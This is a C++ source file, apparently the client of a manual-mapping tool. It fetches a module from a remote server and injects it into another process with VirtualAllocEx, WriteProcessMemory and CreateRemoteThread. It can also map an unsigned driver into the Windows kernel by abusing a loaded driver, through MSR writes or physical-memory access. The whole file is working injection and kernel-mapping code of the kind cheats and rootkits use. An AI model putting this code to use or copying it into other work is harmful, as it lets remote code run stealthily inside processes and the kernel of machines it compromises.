#include <iostream>
#include <ws2tcpip.h>
#include <Psapi.h>

#include <map>
#include <filesystem>

#include "client.hpp"
#include "msrexec/msrexec.hpp"
#include "msrexec/vdm.hpp"
#include "vdm/vdm_ctx.hpp"

using map_symbols_t = std::map<std::string, std::pair<std::uint32_t, std::uint32_t>>;
using extern_symbols_t = std::vector<std::pair<std::string, map_symbols_t>>;

auto get_map_symbols(std::string map_path) -> map_symbols_t
{
	std::ifstream map_file(map_path);

	if (!map_file.is_open())
		return { {}, {} };

	std::string line;
	map_symbols_t result;
	while (std::getline(map_file, line))
	{
		const auto colon_index = line.find(":");
		if (colon_index == std::string::npos)
			break;

		const auto section_number =
			std::strtoul(line.substr(1,
				colon_index).c_str(), NULL, 16);

		const auto section_offset =
			std::strtoull(line.substr(
				colon_index + 1, 16).c_str(), NULL, 16);

		auto symbol = line.substr(
			colon_index + 16 + 8,
			line.length() - (colon_index + 16 + 7));

		symbol[symbol.length()] = '\0';
		result[symbol] = { section_number, section_offset };
	}
	return result;
}

int __cdecl main(int argc, char** argv)
{
	if (argc <= 5)
	{
		std::printf("[!] invalid usage... please review the following:\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoDll --pid 14234\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoImGui --pid 14234\n");
		std::printf("\t\t> --pid, provide a process id to inject into...\n");
		std::printf("\t\t> --ip, must be specific I.E 127.0.0.1...\n");
		std::printf("\t\t> --port, port number to connect too...\n");
		std::printf("\t\t> --DemoDll, streams demo dll...\n");
		std::printf("\t\t> --DemoImGui, streams demo imgui project...\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoDrv --MSREXEC --maps ntoskrnl.exe.map\n");
		std::printf("\t> client.exe --ip 127.0.0.1 --port 1234 --DemoDrv --VDM --maps ntoskrnl.exe.map\n");
		std::printf("\t\t> --pid, provide a process id to inject into...\n");
		std::printf("\t\t> --ip, must be specific I.E 127.0.0.1...\n");
		std::printf("\t\t> --MSREXEC, use MSREXEC to map the driver...\n");
		std::printf("\t\t> --VDM, use VDM to map the driver...\n");
		std::printf("\t\t> --maps, map files for unexported symbols...\n");
		std::printf("\t\t> --DemoDrv, maps demo driver into the kernel...\n");
		return -1;
	}

	int result{};
	SOCKET client_socket;
	WSADATA startup_data;
	ADDRINFOA addr_info, * addr_result = nullptr;
	memset(&addr_info, NULL, sizeof addr_info);

	if ((result = WSAStartup(MAKEWORD(2, 2), &startup_data)))
	{
		std::printf("[!] failed to startup wsa... reason = %d\n", result);
		return -1;
	}

	if ((result = getaddrinfo(argv[2], argv[4], &addr_info, &addr_result)))
	{
		std::printf("[!] failed to get address info = %s:%s, reason = %d\n",
			argv[2], argv[4], result);
		return -1;
	}

	if ((client_socket = socket(addr_result->ai_family,
		addr_result->ai_socktype, addr_result->ai_protocol)) == INVALID_SOCKET)
	{
		std::printf("[!] failed to create socket... reason = %d\n",
			WSAGetLastError());
		return -1;
	}

	if ((result = connect(client_socket, addr_result->ai_addr,
		addr_result->ai_addrlen)) == SOCKET_ERROR)
	{
		std::printf("[!] failed to connect to server... reason = %d\n", 
			WSAGetLastError());
		return -1;
	}

	std::printf("[+] connected to theo server (%s:%s)\n", 
		argv[2], argv[4]);

	theo::theo_data packet;
	packet.type = theo::theo_packet_type::init;

	// determine which file we are asking to map...
	for (auto idx = 0u; idx < argc; ++idx)
	{
		if (!strcmp(argv[idx], "--DemoDll"))
		{
			packet.file = theo::theo_file_type::demo_dll;
			break;
		}
		else if (!strcmp(argv[idx], "--DemoDrv"))
		{
			packet.file = theo::theo_file_type::demo_drv;
			break;
		}
		else if (!strcmp(argv[idx], "--DemoImGui"))
		{
			packet.file = theo::theo_file_type::demo_imgui;
			break;
		}
	}

	switch (packet.file)
	{
		case theo::theo_file_type::demo_dll:
		case theo::theo_file_type::demo_imgui:
		{
			std::uint32_t pid_offset = 0u, pid = 0u;
			for (auto idx = 3; idx < argc; ++idx)
				if (!strcmp(argv[idx], "--pid"))
					pid_offset = idx + 1;

			if (!pid_offset || !(pid = std::atoi(argv[pid_offset])))
			{
				std::printf("[!] invalid pid...\n");
				return -1;
			}

			const auto phandle =
				OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

			if (phandle == INVALID_HANDLE_VALUE)
			{
				std::printf("[!] failed to open handle...\n");
				return -1;
			}

			theo::malloc_t _alloc = 
				[&](std::size_t size, std::uint32_t prot) -> void*
			{
				const auto result = 
					VirtualAllocEx
					(
						phandle,
						nullptr,
						size,
						MEM_COMMIT | MEM_RESERVE,
						prot
					);

				if (!result)
				{
					std::printf("[!] failed to allocate virtual memory...\n");
					exit(-1);
				}

				return result;
			};

			theo::memcpy_t _memcpy =
				[&](void* dest, const void* src, std::size_t size) -> void*
			{
				SIZE_T bytes_handled;
				if (!WriteProcessMemory(phandle, dest, src, size, &bytes_handled))
				{
					std::printf("[!] failed to write memory... reason = 0x%x\n", GetLastError());
					std::getchar();
				}
				return dest;
			};

			theo::resolve_symbol_t _resolver =
				[&](const char* symbol_name) -> std::uintptr_t
			{
				static std::map<std::string, std::uintptr_t> symbol_table;

				if (!symbol_table[symbol_name])
				{
					auto loaded_modules = std::make_unique<HMODULE[]>(64);
					std::uintptr_t result = 0u, loaded_module_sz = 0u;

					if (!EnumProcessModules(phandle,
						loaded_modules.get(), 512, (PDWORD)&loaded_module_sz))
						return {};

					for (auto i = 0u; i < loaded_module_sz / 8u; i++)
					{
						wchar_t file_name[MAX_PATH] = L"";
						if (!GetModuleFileNameExW(phandle,
							loaded_modules.get()[i], file_name, _countof(file_name)))
							continue;

						if ((result = reinterpret_cast<std::uintptr_t>(
							GetProcAddress(LoadLibraryW(file_name), symbol_name))))
							break;
					}

					symbol_table[symbol_name] = result;
					return result;
				}

				return symbol_table[symbol_name];
			};

			theo::client mapper(client_socket, packet, { _alloc, _memcpy, _resolver });
			std::printf("[+] streaming module...\n");

			const auto module_entry = 
				reinterpret_cast<LPTHREAD_START_ROUTINE>(
					mapper.handle());

			std::printf("[+] module entry -> 0x%p\n", module_entry);
			if (module_entry)
			{
				std::uint32_t tid = 0u;
				CreateRemoteThread(phandle, NULL,
					NULL, module_entry, NULL, NULL, (LPDWORD)&tid);
			}
			break;
		}
		case theo::theo_file_type::demo_drv:
		{
			std::uint32_t maps_offset = 0u;
			std::vector<std::pair<std::string, map_symbols_t>> extern_symbols;

			for (auto idx = 5; idx < argc; ++idx)
			{
				if (!strcmp(argv[idx], "--maps"))
				{
					maps_offset = idx + 1;
					break;
				}
			}

			if (maps_offset)
			{
				for (auto idx = maps_offset; idx <= argc - 1; ++idx)
				{
					extern_symbols.push_back
					({
						std::filesystem::path(argv[idx]).stem().string(),
							get_map_symbols(argv[idx])
					});
				}
			}

			std::printf("[+] number of map files = %d\n", extern_symbols.size());
			for (auto idx = 0u; idx < extern_symbols.size(); ++idx)
				std::printf("[+] %s number of symbols = %d\n", 
					extern_symbols[idx].first.c_str(), extern_symbols[idx].second.size());

			theo::resolve_symbol_t _kresolver =
				[&, &extern_symbols = extern_symbols](const char* symbol_name) -> std::uintptr_t
			{
				std::uintptr_t result = 0u;
				utils::kmodule::each_module
				(
					[&](PRTL_PROCESS_MODULE_INFORMATION drv_info, const char* drv_path) -> bool
					{
						const auto drv_name =
							reinterpret_cast<const char*>(
								drv_info->OffsetToFileName + drv_info->FullPathName);

						// false if we found the symbol...
						return (!(result = utils::kmodule::get_export(drv_name, symbol_name)));
					}
				);

				if (!result)
				{
					for (auto& [drv_name, drv_symbols] : extern_symbols)
					{
						// each kernel module... find a driver with a matching map file name...
						// I.E ntoskrnl.exe.map == ntoskrnl.exe...
						utils::kmodule::each_module
						(
							[&, &drv_name = drv_name, &drv_symbols = drv_symbols]
							(PRTL_PROCESS_MODULE_INFORMATION drv_info, const char* drv_path) -> bool
							{
								const auto _drv_name =
									reinterpret_cast<const char*>(
										drv_info->OffsetToFileName + drv_info->FullPathName);

								// if this is the driver, load it, loop over its sections
								// calc the absolute virtual address of the symbol...
								if (!strcmp(_drv_name, drv_name.c_str()))
								{
									const auto drv_load_addr =
										reinterpret_cast<std::uintptr_t>(
											LoadLibraryExA(drv_path, NULL, DONT_RESOLVE_DLL_REFERENCES));

									std::uint32_t section_count = 1u;
									utils::pe::each_section
									(
										[&, &drv_symbols = drv_symbols]
										(PIMAGE_SECTION_HEADER section_header, std::uintptr_t img_base) -> bool
										{
											if (section_count == drv_symbols[symbol_name].first)
											{
												result = reinterpret_cast<std::uintptr_t>(drv_info->ImageBase) +
													section_header->VirtualAddress + drv_symbols[symbol_name].second;

												// we found the symbol...
												return false;
											}

											++section_count;
											// keep going over sections...
											return true;
										}, drv_load_addr
									);
								}

								// keep looping over modules until we resolve the symbol...
								return !result;
							}
						);

						// if we found the symbol then break out of the loop... else keep looping...
						if (result) break;
					}
				}

				// finally return the result...
				return result;
			};

			for (auto idx = 0u; idx < argc; ++idx)
			{
				if (!strcmp(argv[idx], "--MSREXEC"))
				{
					const auto [drv_handle, drv_key, drv_status] = msrexec::load_drv();
					if (drv_status != STATUS_SUCCESS || drv_handle == INVALID_HANDLE_VALUE)
					{
						std::printf("> failed to load driver... reason -> 0x%x\n", drv_status);
						return -1;
					}

					writemsr_t _write_msr =
						[&](std::uint32_t key, std::uint64_t value) -> bool
					{
						return msrexec::writemsr(key, value);
					};

					vdm::msrexec_ctx msrexec(_write_msr);

					theo::malloc_t _kalloc = 
						[&](std::size_t size, std::uint32_t prot) -> void*
					{
						void* alloc_base;
						msrexec.exec
						(
							[&](void* krnl_base, get_system_routine_t get_kroutine) -> void
							{
								using ex_alloc_pool_t =
									void* (*)(std::uint32_t, std::size_t);

								const auto ex_alloc_pool =
									reinterpret_cast<ex_alloc_pool_t>(
										get_kroutine(krnl_base, "ExAllocatePool"));

								alloc_base = ex_alloc_pool(NULL, size);
							}
						);
						return alloc_base;
					};

					theo::memcpy_t _kmemcpy =
						[&](void* dest, const void* src, std::size_t size) -> void*
					{
						void* result = nullptr;
						msrexec.exec
						(
							[&](void* krnl_base, get_system_routine_t get_kroutine) -> void
							{
								const auto kmemcpy =
									reinterpret_cast<decltype(&memcpy)>(
										get_kroutine(krnl_base, "memcpy"));

								result = kmemcpy(dest, src, size);
							}
						);
						return result;
					};

					theo::client mapper(client_socket, packet, { _kalloc, _kmemcpy, _kresolver });
					std::printf("[+] streaming kernel module...\n");

					const auto module_entry =
						reinterpret_cast<LPTHREAD_START_ROUTINE>(
							mapper.handle());

					std::printf("[+] driver entry -> 0x%p\n", module_entry);
					std::getchar();

					if (module_entry)
					{
						int result;
						msrexec.exec([&result, drv_entry = module_entry]
							(void* krnl_base, get_system_routine_t get_kroutine) -> void
						{
							using drv_entry_t = int(*)();
							result = reinterpret_cast<drv_entry_t>(drv_entry)();
						});
					}

					const auto unload_status = msrexec::unload_drv(drv_handle, drv_key);
					if (unload_status != STATUS_SUCCESS)
					{
						std::printf("> failed to unload driver... reason -> 0x%x\n", unload_status);
						return -1;
					}
					break;
				}
				else if (!strcmp(argv[idx], "--VDM"))
				{
					const auto [drv_handle, drv_key, drv_status] = vdm::load_drv();
					if (drv_status != STATUS_SUCCESS || drv_handle == INVALID_HANDLE_VALUE)
					{
						std::printf("> failed to load driver... reason -> 0x%x\n", drv_status);
						return -1;
					}

					// read physical memory using the driver...
					vdm::read_phys_t _read_phys =
						[&](void* addr, void* buffer, std::size_t size) -> bool
					{
						return vdm::read_phys(addr, buffer, size);
					};

					// write physical memory using the driver...
					vdm::write_phys_t _write_phys =
						[&](void* addr, void* buffer, std::size_t size) -> bool
					{
						return vdm::write_phys(addr, buffer, size);
					};

					// use VDM to syscall into ExAllocatePool...
					vdm::vdm_ctx vdm(_read_phys, _write_phys);

					theo::malloc_t _kalloc = 
						[&](std::size_t size, std::uint32_t prot) -> void*
					{
						using ex_alloc_pool_t =
							void* (*)(std::uint32_t, std::uint32_t);

						static const auto ex_alloc_pool =
							reinterpret_cast<void*>(
								utils::kmodule::get_export(
									"ntoskrnl.exe", "ExAllocatePool"));

						return vdm.syscall<ex_alloc_pool_t>(ex_alloc_pool, NULL, size);
					};

					// use VDM to syscall into memcpy exported by ntoskrnl.exe...
					theo::memcpy_t _kmemcpy =
						[&](void* dest, const void* src, std::size_t size) -> void*
					{
						static const auto kmemcpy =
							reinterpret_cast<void*>(
								utils::kmodule::get_export(
									"ntoskrnl.exe", "memcpy"));

						return vdm.syscall<decltype(&memcpy)>(kmemcpy, dest, src, size);
					};

					theo::client mapper(client_socket, packet, { _kalloc, _kmemcpy, _kresolver });

					const auto module_entry =
						reinterpret_cast<LPTHREAD_START_ROUTINE>(
							mapper.handle());

					std::printf("[+] driver entry -> 0x%p\n", module_entry);
					std::getchar();

					if (module_entry)
					{
						// call driver entry... its up to you to do this using whatever method...
						// with VDM you can syscall into it... with msrexec you will use msrexec::exec...
						const auto entry_result =
							vdm.syscall<NTSTATUS(*)()>(
								reinterpret_cast<void*>(module_entry));
					}

					const auto unload_status = vdm::unload_drv(drv_handle, drv_key);
					if (unload_status != STATUS_SUCCESS)
					{
						std::printf("> failed to unload driver... reason -> 0x%x\n", unload_status);
						return -1;
					}
					break;
				}
			}
			break;
		}
		default:
		{
			std::printf("[!] invalid demo file option...\n");
			return -1;
		}
	}

	std::printf("[+] press enter to close...\n");
	std::getchar();
}